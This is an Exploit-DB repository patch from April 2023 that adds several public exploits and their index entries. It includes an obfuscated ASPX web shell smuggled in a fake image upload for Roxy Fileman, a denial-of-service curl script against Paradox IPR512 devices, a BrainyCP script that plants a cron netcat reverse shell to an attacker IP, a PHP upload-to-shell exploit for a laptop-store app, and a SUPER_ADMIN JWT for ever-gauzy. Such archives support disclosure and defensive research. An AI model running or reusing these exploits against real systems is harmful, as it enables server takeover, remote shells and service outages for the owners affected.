From 0cb2c9699d5650555c0362df8346db1aa555f0c5 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 11 Apr 2023 00:16:33 +0000 Subject: [PATCH] DB: 2023-04-11 8 changes to exploits/shellcodes/ghdb Roxy Fileman 1.4.5 - Arbitrary File Upload Paradox Security Systems IPR512 - Denial Of Service WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing BrainyCP V1.0 - Remote Code Execution Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) ever gauzy v0.281.9 - JWT weak HMAC secret --- exploits/ashx/webapps/51355.txt | 160 ++++++++++++++++++++++++++ exploits/hardware/dos/51356.sh | 62 ++++++++++ exploits/multiple/local/51359.txt | 40 +++++++ exploits/php/webapps/51357.py | 47 ++++++++ exploits/php/webapps/51358.py | 80 +++++++++++++ exploits/typescript/webapps/51354.txt | 81 +++++++++++++ files_exploits.csv | 8 +- ghdb.xml | 46 ++++++++ 8 files changed, 523 insertions(+), 1 deletion(-) create mode 100644 exploits/ashx/webapps/51355.txt create mode 100755 exploits/hardware/dos/51356.sh create mode 100644 exploits/multiple/local/51359.txt create mode 100755 exploits/php/webapps/51357.py create mode 100755 exploits/php/webapps/51358.py create mode 100644 exploits/typescript/webapps/51354.txt diff --git a/exploits/ashx/webapps/51355.txt b/exploits/ashx/webapps/51355.txt new file mode 100644 index 000000000..6c0d5670d --- /dev/null +++ b/exploits/ashx/webapps/51355.txt @@ -0,0 +1,160 @@ +# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload +# Date: 09/04/2023 +# Exploit Author: Zer0FauLT [admindeepsec@proton.me] +# Vendor Homepage: roxyfileman.com +# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net +# Version: <= 1.4.5 +# Tested on: Windows 10 and Windows Server 2019 +# CVE : 0DAY + +########################################################################################## +# First, we upload the .jpg shell file to the server. # +########################################################################################## + +POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2 +Host: pentest.com +Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest +Content-Length: 666 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Accept: */* +Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://pentest.com +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://pentest.com/admin/fileman/index.aspx +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundarygOxjsc2hpmwmISeJ +Content-Disposition: form-data; name="action" + +upload +------WebKitFormBoundarygOxjsc2hpmwmISeJ +Content-Disposition: form-data; name="method" + +ajax +------WebKitFormBoundarygOxjsc2hpmwmISeJ +Content-Disposition: form-data; name="d" + +/Upload/PenTest +------WebKitFormBoundarygOxjsc2hpmwmISeJ +Content-Disposition: form-data; name="files[]"; filename="test.jpg" +Content-Type: image/jpeg + +‰PNG +<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> +<%var PAY:String= +Request["\x61\x62\x63\x64"];eval +(PAY,"\x75\x6E\x73\x61"+ +"\x66\x65");%> +------WebKitFormBoundarygOxjsc2hpmwmISeJ-- + +########################################################################################## +# In the second stage, we manipulate the .jpg file that we uploaded to the server. # +########################################################################################## + +{ +"FILES_ROOT": "", +"RETURN_URL_PREFIX": "", +"SESSION_PATH_KEY": "", +"THUMBS_VIEW_WIDTH": "140", +"THUMBS_VIEW_HEIGHT": "120", +"PREVIEW_THUMB_WIDTH": "300", +"PREVIEW_THUMB_HEIGHT":"200", +"MAX_IMAGE_WIDTH": "1000", +"MAX_IMAGE_HEIGHT": "1000", +"INTEGRATION": "ckeditor", +"DIRLIST": "asp_net/main.ashx?a=DIRLIST", +"CREATEDIR": "asp_net/main.ashx?a=CREATEDIR", +"DELETEDIR": "asp_net/main.ashx?a=DELETEDIR", +"MOVEDIR": "asp_net/main.ashx?a=MOVEDIR", +"COPYDIR": "asp_net/main.ashx?a=COPYDIR", +"RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR", +"FILESLIST": "asp_net/main.ashx?a=FILESLIST", +"UPLOAD": "asp_net/main.ashx?a=UPLOAD", +"DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD", +"DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR", +"DELETEFILE": "asp_net/main.ashx?a=DELETEFILE", +"MOVEFILE": "asp_net/main.ashx?a=MOVEFILE", +"COPYFILE": "asp_net/main.ashx?a=COPYFILE", +"RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE", +"GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB", +"DEFAULTVIEW": "list", +"FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess", +"ALLOWED_UPLOADS": "bmp gif png jpg jpeg", +"FILEPERMISSIONS": "0644", +"DIRPERMISSIONS": "0755", +"LANG": "auto", +"DATEFORMAT": "dd/MM/yyyy HH:mm", +"OPEN_LAST_DIR": "yes" +} + +############################################################################################################################################################################################################################ +# We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows. # +############################################################################################################################################################################################################################ + +POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2 +Host: pentest.com +Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest +Content-Length: 44 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://pentest.com +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://pentest.com/admin/fileman/index.aspx +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx + +=========================================================================================================================================================================================================================== + +POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2 +Host: pentest.com +Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest +Content-Length: 68 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://pentest.com +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://pentest.com/admin/fileman/index.aspx +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx + +########################################################################################## +# and it's done! # +########################################################################################## + +HTTP/2 200 OK +Cache-Control: private +Content-Type: text/html; charset=utf-8 +Vary: Accept-Encoding +Server: Microsoft-IIS/10.0 +X-Aspnet-Version: 4.0.30319 +X-Powered-By-Plesk: PleskWin +Date: Sun, 09 Apr 2023 09:49:34 GMT +Content-Length: 21 + +{"res":"ok","msg":""} + +============================================================================================= \ No newline at end of file diff --git a/exploits/hardware/dos/51356.sh b/exploits/hardware/dos/51356.sh new file mode 100755 index 000000000..5360b6ce5 --- /dev/null +++ b/exploits/hardware/dos/51356.sh @@ -0,0 +1,62 @@ +#!/bin/bash + +# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service +# Google Dork: intitle:"ipr512 * - login screen" +# Date: 09-APR-2023 +# Exploit Author: Giorgi Dograshvili +# Vendor Homepage: Paradox - Headquarters (https://www.paradox.com/Products/default.asp?PID=423) +# Version: IPR512 +# CVE : CVE-2023-24709 + +# Function to display banner message +display_banner() { + echo "******************************************************" + echo "* *" + echo "* PoC CVE-2023-24709 *" + echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" + echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" + echo "* by SlashXzerozero *" + echo "* *" + echo "******************************************************" +} + +# Call the function to display the banner +display_banner + echo "" + echo "" + echo "Please enter a domain name or IP address with or without port" +read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain + +# Step 2: Ask for user confirmation +read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm +if [[ $confirm == "Y" || $confirm == "y" ]]; then + # Display loading animation + animation=("|" "/" "-" "\\") + index=0 + while [[ $index -lt 10 ]]; do + echo -ne "Loading ${animation[index]} \r" + sleep 1 + index=$((index + 1)) + done + + # Use curl to send HTTP GET request with custom headers and timeout + response=$(curl -i -s -k -X GET \ + -H "Host: $domain" \ + -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ + -H "Accept: */" \ + -H "Referer: http://$domain/login.html" \ + -H "Accept-Encoding: gzip, deflate" \ + -H "Accept-Language: en-US,en;q=0.9" \ + -H "Connection: close" \ + --max-time 10 \ + "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") + + # Check response for HTTP status code 200 and print result + if [[ $response == *"HTTP/1.1 200 OK"* ]]; then + echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" + else + echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" + fi +else + echo "The script is stopped!." +fi \ No newline at end of file diff --git a/exploits/multiple/local/51359.txt b/exploits/multiple/local/51359.txt new file mode 100644 index 000000000..8bcfcaeba --- /dev/null +++ b/exploits/multiple/local/51359.txt @@ -0,0 +1,40 @@ +## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability +## Author: nu11secur1ty +## Date: 04.10.2023 +## Vendor: https://developer.microsoft.com/en-us/ +## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/ +## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/ +## CVE ID: CVE-2023-24892 + +## Description: +The Webview2 development platform is vulnerable to Spoofing attacks. +The attacker can build a very malicious web app and spread it to the +victim's networks. +and when they open it this can be the last web app opening for them. + +STATUS: HIGH Vulnerability + +[+]Exploit: + +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC) + + +## Reproduce: +[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892) + +## Proof and Exploit: +[href](https://streamable.com/uk7l2n) + +## Time spend: +03:00:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51357.py b/exploits/php/webapps/51357.py new file mode 100755 index 000000000..1a204a2af --- /dev/null +++ b/exploits/php/webapps/51357.py @@ -0,0 +1,47 @@ +# Exploit Title: BrainyCP V1.0 - Remote Code Execution +# Date: 2023-04-03 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://brainycp.io +# Demo: https://demo.brainycp.io +# Tested on: Kali Linux +# CVE : N/A + +import requests + +# credentials +url = input("URL: ") +username = input("Username: ") +password = input("Password: ") +ip = input("IP: ") +port = input("Port: ") + +# login +session = requests.Session() +login_url = f"{url}/auth.php" +login_data = {"login": username, "password": password, "lan": "/"} +response = session.post(login_url, data=login_data) +if "Sign In" in response.text: + print("[-] Wrong credentials or may the system patched.") + exit() + + +# reverse shell +reverse_shell = f"nc {ip} {port} -e /bin/bash" + +# request +add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron" +add_cron_data = { + "cron_freq_minutes": "*", + "cron_freq_minutes_own": "", + "cron_freq_hours": "*", + "cron_freq_hours_own": "", + "cron_freq_days": "*", + "cron_freq_days_own": "", + "cron_freq_months": "*", + "cron_freq_weekdays": "*", + "cron_command": reverse_shell, + "cron_user": username, +} +response = session.post(add_cron_url, data=add_cron_data) + +print("[+] Check your listener!") \ No newline at end of file diff --git a/exploits/php/webapps/51358.py b/exploits/php/webapps/51358.py new file mode 100755 index 000000000..22e260863 --- /dev/null +++ b/exploits/php/webapps/51358.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python3 + +# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE) +# Date: 09/04/2023 +# Exploit Author: Matisse Beckandt (Backendt) +# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip +# Version: 1.0 +# Tested on: Debian 11.6 +# CVE : CVE-2023-1826 + +# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution. +import requests +from argparse import ArgumentParser +from uuid import uuid4 +from datetime import datetime, timezone + +def interactiveShell(fileUrl: str): + print("Entering pseudo-shell. Type 'exit' to quit") + while True: + command = input("\n$ ") + if command == "exit": + break + + response = requests.get(f"{fileUrl}?cmd={command}") + print(response.text) + +def uploadFile(url: str, filename: str, content): + endpoint = f"{url}/classes/SystemSettings.php?f=update_settings" + file = {"img": (filename, content)} + + response = requests.post(endpoint, files=file) + return response + +def getUploadedFileUrl(url: str, filename: str): + timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes + epoch = int(timeNow.timestamp()) # Time in milliseconds + possibleFilename = f"{epoch}_{filename}" + fileUrl = f"{url}/uploads/{possibleFilename}" + response = requests.get(fileUrl) + if response.status_code == 200: + return fileUrl + +def exploit(url: str): + filename = str(uuid4()) + ".php" + content = "" + response = uploadFile(url, filename, content) + + if response.status_code != 200: + print(f"[File Upload] Got status code {response.status_code}. Expected 200.") + + uploadedUrl = getUploadedFileUrl(url, filename) + if uploadedUrl == None: + print("Error. Could not find the uploaded file.") + exit(1) + print(f"Uploaded file is at {uploadedUrl}") + + try: + interactiveShell(uploadedUrl) + except KeyboardInterrupt: + pass + print("\nQuitting.") + +def getWebsiteURL(url: str): + if not url.startswith("http"): + url = "http://" + url + if url.endswith("/"): + url = url[:-1] + return url + +def main(): + parser = ArgumentParser(description="Exploit for CVE-2023-1826") + parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/") + args = parser.parse_args() + + url = getWebsiteURL(args.url) + exploit(url) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/typescript/webapps/51354.txt b/exploits/typescript/webapps/51354.txt new file mode 100644 index 000000000..c77bb0785 --- /dev/null +++ b/exploits/typescript/webapps/51354.txt @@ -0,0 +1,81 @@ +## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret +## Author: nu11secur1ty +## Date: 04.08.2023 +## Vendor: https://gauzy.co/ +## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9 +## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret + +## Description: +It was, detected a JWT signed using a well-known `HMAC secret key`. +The key used which was found was a secret Key. +The user can find a secret key authentication while sending normal +post requests. +After he found the `Authorization: Bearer` key he can use it to authenticate +and he can be sending a very malicious POST request, it depends on the +scenario. + +STATUS: +[+]Issue: JWT weak HMAC secret +[+]Severity: High + +[+]Exploit: +```GET +GET /api/auth/authenticated HTTP/2 +Host: apidemo.gauzy.co +Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112" +Accept: application/json, text/plain, */* +Language: en +Sec-Ch-Ua-Mobile: ?0 +Authorization: Bearer +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjJjMWViM2ViLTI3ZDEtNGE2Ni05YjEzLTg4ODVhNmFhYWJlMiIsInRlbmFudElkIjoiMTA0YjhiMDQtNmYzNi00YWMzLWFjNWItNTg4MWQyNjJmMWUxIiwiZW1wbG95ZWVJZCI6bnVsbCwicm9sZSI6IlNVUEVSX0FETUlOIiwicGVybWlzc2lvbnMiOlsiQURNSU5fREFTSEJPQVJEX1ZJRVciLCJURUFNX0RBU0hCT0FSRCIsIlBST0pFQ1RfTUFOQUdFTUVOVF9EQVNIQk9BUkQiLCJUSU1FX1RSQUNLSU5HX0RBU0hCT0FSRCIsIkFDQ09VTlRJTkdfREFTSEJPQVJEIiwiSFVNQU5fUkVTT1VSQ0VfREFTSEJPQVJEIiwiT1JHX1BBWU1FTlRfVklFVyIsIk9SR19QQVlNRU5UX0FERF9FRElUIiwiT1JHX0lOQ09NRVNfVklFVyIsIk9SR19JTkNPTUVTX0VESVQiLCJPUkdfRVhQRU5TRVNfVklFVyIsIk9SR19FWFBFTlNFU19FRElUIiwiUFJPRklMRV9FRElUIiwiRU1QTE9ZRUVfRVhQRU5TRVNfVklFVyIsIkVNUExPWUVFX0VYUEVOU0VTX0VESVQiLCJPUkdfUFJPUE9TQUxTX1ZJRVciLCJPUkdfUFJPUE9TQUxTX0VESVQiLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX1ZJRVciLCJPUkdfUFJPUE9TQUxfVEVNUExBVEVTX0VESVQiLCJPUkdfVEFTS19BREQiLCJPUkdfVEFTS19WSUVXIiwiT1JHX1RBU0tfRURJVCIsIk9SR19UQVNLX0RFTEVURSIsIk9SR19USU1FX09GRl9WSUVXIiwiT1JHX0VNUExPWUVFU19WSUVXIiwiT1JHX0VNUExPWUVFU19FRElUIiwiT1JHX0NBTkRJREFURVNfVklFVyIsIk9SR19DQU5ESURBVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV19WSUVXIiwiT1JHX0NBTkRJREFURVNfRE9DVU1FTlRTX1ZJRVciLCJPUkdfQ0FORElEQVRFU19UQVNLX0VESVQiLCJPUkdfQ0FORElEQVRFU19GRUVEQkFDS19FRElUIiwiT1JHX0lOVkVOVE9SWV9QUk9EVUNUX0VESVQiLCJPUkdfSU5WRU5UT1JZX1ZJRVciLCJPUkdfVEFHU19BREQiLCJPUkdfVEFHU19WSUVXIiwiT1JHX1RBR1NfRURJVCIsIk9SR19UQUdTX0RFTEVURSIsIk9SR19VU0VSU19WSUVXIiwiT1JHX1VTRVJTX0VESVQiLCJPUkdfSU5WSVRFX1ZJRVciLCJPUkdfSU5WSVRFX0VESVQiLCJBTExfT1JHX1ZJRVciLCJBTExfT1JHX0VESVQiLCJQT0xJQ1lfVklFVyIsIlBPTElDWV9FRElUIiwiVElNRV9PRkZfRURJVCIsIlJFUVVFU1RfQVBQUk9WQUxfVklFVyIsIlJFUVVFU1RfQVBQUk9WQUxfRURJVCIsIkFQUFJPVkFMU19QT0xJQ1lfVklFVyIsIkFQUFJPVkFMU19QT0xJQ1lfRURJVCIsIkNIQU5HRV9TRUxFQ1RFRF9FTVBMT1lFRSIsIkNIQU5HRV9TRUxFQ1RFRF9DQU5ESURBVEUiLCJDSEFOR0VfU0VMRUNURURfT1JHQU5JWkFUSU9OIiwiQ0hBTkdFX1JPTEVTX1BFUk1JU1NJT05TIiwiQUNDRVNTX1BSSVZBVEVfUFJPSkVDVFMiLCJUSU1FU0hFRVRfRURJVF9USU1FIiwiU1VQRVJfQURNSU5fRURJVCIsIlBVQkxJQ19QQUdFX0VESVQiLCJJTlZPSUNFU19WSUVXIiwiSU5WT0lDRVNfRURJVCIsIkVTVElNQVRFU19WSUVXIiwiRVNUSU1BVEVTX0VESVQiLCJPUkdfQ0FORElEQVRFU19JTlRFUlZJRVdFUlNfRURJVCIsIk9SR19DQU5ESURBVEVTX0lOVEVSVklFV0VSU19WSUVXIiwiVklFV19BTExfRU1BSUxTIiwiVklFV19BTExfRU1BSUxfVEVNUExBVEVTIiwiT1JHX0hFTFBfQ0VOVEVSX0VESVQiLCJWSUVXX1NBTEVTX1BJUEVMSU5FUyIsIkVESVRfU0FMRVNfUElQRUxJTkVTIiwiQ0FOX0FQUFJPVkVfVElNRVNIRUVUIiwiT1JHX1NQUklOVF9WSUVXIiwiT1JHX1NQUklOVF9FRElUIiwiT1JHX0NPTlRBQ1RfRURJVCIsIk9SR19DT05UQUNUX1ZJRVciLCJPUkdfUFJPSkVDVF9BREQiLCJPUkdfUFJPSkVDVF9WSUVXIiwiT1JHX1BST0pFQ1RfRURJVCIsIk9SR19QUk9KRUNUX0RFTEVURSIsIk9SR19URUFNX0FERCIsIk9SR19URUFNX1ZJRVciLCJPUkdfVEVBTV9FRElUIiwiT1JHX1RFQU1fREVMRVRFIiwiT1JHX1RFQU1fSk9JTl9SRVFVRVNUX1ZJRVciLCJPUkdfVEVBTV9KT0lOX1JFUVVFU1RfRURJVCIsIk9SR19DT05UUkFDVF9FRElUIiwiRVZFTlRfVFlQRVNfVklFVyIsIlRJTUVfVFJBQ0tFUiIsIlRFTkFOVF9BRERfRVhJU1RJTkdfVVNFUiIsIklOVEVHUkFUSU9OX1ZJRVciLCJGSUxFX1NUT1JBR0VfVklFVyIsIlBBWU1FTlRfR0FURVdBWV9WSUVXIiwiU01TX0dBVEVXQVlfVklFVyIsIkNVU1RPTV9TTVRQX1ZJRVciLCJJTVBPUlRfRVhQT1JUX1ZJRVciLCJNSUdSQVRFX0dBVVpZX0NMT1VEIiwiT1JHX0pPQl9FTVBMT1lFRV9WSUVXIiwiT1JHX0pPQl9NQVRDSElOR19WSUVXIiwiSU5WRU5UT1JZX0dBTExFUllfQUREIiwiSU5WRU5UT1JZX0dBTExFUllfVklFVyIsIklOVkVOVE9SWV9HQUxMRVJZX0VESVQiLCJJTlZFTlRPUllfR0FMTEVSWV9ERUxFVEUiLCJNRURJQV9HQUxMRVJZX0FERCIsIk1FRElBX0dBTExFUllfVklFVyIsIk1FRElBX0dBTExFUllfRURJVCIsIk1FRElBX0dBTExFUllfREVMRVRFIiwiT1JHX0VRVUlQTUVOVF9WSUVXIiwiT1JHX0VRVUlQTUVOVF9FRElUIiwiT1JHX0VRVUlQTUVOVF9TSEFSSU5HX1ZJRVciLCJPUkdfRVFVSVBNRU5UX1NIQVJJTkdfRURJVCIsIkVRVUlQTUVOVF9NQUtFX1JFUVVFU1QiLCJFUVVJUE1FTlRfQVBQUk9WRV9SRVFVRVNUIiwiT1JHX1BST0RVQ1RfVFlQRVNfVklFVyIsIk9SR19QUk9EVUNUX1RZUEVTX0VESVQiLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX1ZJRVciLCJPUkdfUFJPRFVDVF9DQVRFR09SSUVTX0VESVQiLCJWSUVXX0FMTF9BQ0NPVU5USU5HX1RFTVBMQVRFUyIsIlRFTkFOVF9TRVRUSU5HIiwiQUxMT1dfREVMRVRFX1RJTUUiLCJBTExPV19NT0RJRllfVElNRSIsIkFMTE9XX01BTlVBTF9USU1FIiwiREVMRVRFX1NDUkVFTlNIT1RTIl0sImlhdCI6MTY4MDk4MDAzMn0.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 +Safari/537.36 +Sec-Ch-Ua-Platform: "Windows" +Origin: https://demo.gauzy.co +Sec-Fetch-Site: same-site +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://demo.gauzy.co/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Content-Length: 76 + +{ + "email":"local.admin@ever.co", + "password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED" +} + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9) + +## Proof and Exploit: +[href](https://streamable.com/afsmee) + +## Time spend: +03:37:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2b84da35e..75d8aa311 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -249,6 +249,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31574,exploits/arm/local/31574.c,"Linux Kernel < 3.4.5 (Android 4.2.2/4.4 ARM) - Local Privilege Escalation",2014-02-11,"Piotr Szerman",local,arm,,2014-02-16,2016-12-01,0,CVE-2013-6282;OSVDB-99940,,,,, 41471,exploits/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Command Execution (Metasploit)",2017-02-27,Metasploit,remote,arm,,2017-02-27,2017-02-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/236606838a0910235aa056e2ac1282298bc3a038/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb 39497,exploits/ashx/webapps/39497.txt,"Infor CRM 8.2.0.1136 - Multiple HTML Script Injection Vulnerabilities",2016-02-26,LiquidWorm,webapps,ashx,,2016-02-26,2016-02-26,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php +51355,exploits/ashx/webapps/51355.txt,"Roxy Fileman 1.4.5 - Arbitrary File Upload",2023-04-10,Zer0FauLT,webapps,ashx,,2023-04-10,2023-04-10,0,,,,,, 46765,exploits/ashx/webapps/46765.txt,"Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,,2019-04-30,2019-04-30,0,CVE-2019-11569,"Cross-Site Request Forgery (CSRF)",,,, 46766,exploits/ashx/webapps/46766.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,,2019-04-30,2019-04-30,0,,"Cross-Site Scripting (XSS)",,,, 46767,exploits/ashx/webapps/46767.txt,"Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)",2019-04-30,"Seyed Sadegh Khatami",webapps,ashx,,2019-04-30,2019-04-30,0,,"Cross-Site Scripting (XSS)",,,, @@ -3142,6 +3143,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 29402,exploits/hardware/dos/29402.txt,"Packeteer PacketShaper 8.0 - Multiple Buffer Overflow (Denial of Service) (PoC) Vulnerabilities",2007-01-08,kian.mohageri,dos,hardware,,2007-01-08,2013-11-03,1,CVE-2007-0113;OSVDB-31656,,,,,https://www.securityfocus.com/bid/21933/info 9956,exploits/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",dos,hardware,,2009-10-13,,1,OSVDB-62374;CVE-2009-5098,,,,, 33280,exploits/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd 